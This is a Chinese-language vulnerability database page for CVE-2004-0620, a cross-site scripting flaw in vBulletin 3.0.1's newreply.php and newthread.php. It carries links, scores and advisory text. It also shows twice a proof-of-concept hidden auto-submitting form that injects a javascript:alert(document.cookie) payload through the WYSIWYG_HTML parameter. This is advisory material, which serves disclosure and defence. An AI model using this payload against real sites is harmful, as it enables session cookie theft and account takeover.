CVE-2004-0620
CVSS4.3
发布时间 :2004-12-06 00:00:00
修订时间 :2016-10-17 22:46:55
NMCOES    

[原文]Cross-site scripting (XSS) vulnerability in (1) newreply.php or (2) newthread.php in vBulletin 3.0.1 allows remote attackers to inject arbitrary HTML or script as other users via the Edit-panel.


[CNNVD]VBulletin多模块HTML注入漏洞 (CNNVD-200412-056)

        vBulletin 3.0.1版本的(1)newreply.php或者(2) newthread.php存在跨站脚本漏洞。远程攻击者像其他用户一样借助Edit-panel注入任意HTML或者脚本。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0620
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0620
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-056
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108809720026642&w=2
(UNKNOWN)  BUGTRAQ  20040624 vBulletin HTML Injection Vuln
http://www.securityfocus.com/bid/10602
(VENDOR_ADVISORY)  BID  10602
http://xforce.iss.net/xforce/xfdb/16502
(VENDOR_ADVISORY)  XF  vbulletin-newreply-newthread-xss(16502)

- 漏洞信息

VBulletin多模块HTML注入漏洞
中危 跨站脚本
2004-12-06 00:00:00 2005-10-20 00:00:00
远程  
        vBulletin 3.0.1版本的(1)newreply.php或者(2) newthread.php存在跨站脚本漏洞。远程攻击者像其他用户一样借助Edit-panel注入任意HTML或者脚本。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24234)

VBulletin 3.0.1 newreply.php WYSIWYG_HTML Parameter XSS (EDBID:24234)
php webapps
2004-06-24 Verified
0 Cheng Peng Su
N/A [点击下载]
source: http://www.securityfocus.com/bid/10602/info

VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.

An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.

This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.

<form action="http://www.example.com/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt; 		

- 漏洞信息

7256
vBulletin newreply.php WYSIWYG_HTML Parameter XSS
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Unknown

- 漏洞描述

vBulletin newreply.php script contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not properly sanitize input passed to the "WYSIWYG_HTML" parameter prior to returning it to the user. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-06-25 2004-06-24
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

VBulletin Multiple Module HTML Injection Vulnerability
Input Validation Error 10602
Yes No
2004-06-24 12:00:00 2009-07-12 05:16:00
Discovery is credited to Cheng Peng Su <apple_soup@msn.com>.

- 受影响的程序版本

VBulletin VBulletin 3.0.1

- 漏洞讨论

VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.

An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.

This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.

- 漏洞利用

No exploit is required.

The following proof of concept is available:
&lt;form action="http://www.example.com/newreply.php" name="vbform"
method="post" style='visibility:hidden'&gt;
&lt;input name="WYSIWYG_HTML"
value="&amp;lt;IMG src=&amp;quot;javascript:alert(document.cookie)&amp;quot;&amp;gt;"/&gt;
&lt;input name="do" value="postreply"/&gt;
&lt;input name="t" value="123456" /&gt;
&lt;input name="p" value="123456" /&gt;
&lt;input type="submit" class="button" name="preview"/&gt;
&lt;/form&gt;
&amp;lt;script&amp;gt;
document.all.preview.click();
&amp;lt;/script&amp;gt;

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站